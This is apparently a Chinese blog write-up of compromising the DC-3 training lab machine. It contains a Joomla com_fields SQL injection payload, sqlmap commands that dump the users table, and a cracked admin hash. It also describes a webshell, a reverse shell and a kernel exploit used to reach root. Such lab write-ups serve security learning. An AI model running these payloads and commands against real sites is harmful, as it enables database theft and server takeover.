DC靶机系列(三)

3 篇文章 0 订阅
3 篇文章 0 订阅

内网探测找到ip
访问并指纹识别
在这里插入图片描述
joomscan扫一下
在这里插入图片描述
得到敏感目录、后台、及详细版本
google一下在这里插入图片描述
有现成的可以用,相关复现请移步https://paper.seebug.org/305/
payload使用http://ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(2,concat(0x7e,(version())),0)

sqlmap -uhttp://ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(2,concat(0x7e,(version())),0) --dbs
在这里插入图片描述
sqlmap -uhttp://ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(2,concat(0x7e,(version())),0) -D joomladb --tables在这里插入图片描述
一大堆表这个#__users表查一下在这里插入图片描述
sqlmap -uhttp://ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(2,concat(0x7e,(version())),0) -D joomladb -T ‘#__users’ --dump
在这里插入图片描述

格式真乱。。。。。。。
提取下有用信息
sqlmap -uhttp://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(2,concat(0x7e,(version())),0) -D joomladb -T ‘#__users’ -C ‘username,password’ --dump在这里插入图片描述
admin:$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
提取到有效信息john一下
在这里插入图片描述
关于mac下john的安装及配置请移步下一篇(有坑)
得到admin:snoopy
在这里插入图片描述
尝试登陆,成功
尝试登陆后台在这里插入图片描述
成功
在这里插入图片描述
之前joomscan扫出这几个敏感目录,重点关注一下
在这里插入图片描述
是可以直接修改代码的
根据目录结构尝试访问
http://192.168.1.106/administrator/templates/beez3/html/
在这里插入图片描述
那说明这里的templates目录不是administrator下的,应该是这个cms单独的templates,访问
http://192.168.1.106/templates/beez3/html/
在这里插入图片描述
明确目录就可以写一句话了,写一个反弹的也行,事实证明反弹一个更好,在使用蚁剑连接的时候提权未成功。。。。。

一句话在这里插入图片描述
蚁剑连在这里插入图片描述

反弹shell
在这里插入图片描述
在这里插入图片描述
cms后台systeminfomation显示操作系统为ubuntu 16.04
在这里插入图片描述
google得该版本可使用39772
上传、解压、编译一气呵成
在这里插入图片描述
./doubleput获得root权限
在这里插入图片描述
移步root目录获取finalflag
在这里插入图片描述
!!!
小结:熟悉了joomla目录结构,及相应扫描工具,这个靶机主要考验google能力,都是已爆的洞,没什么难度

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值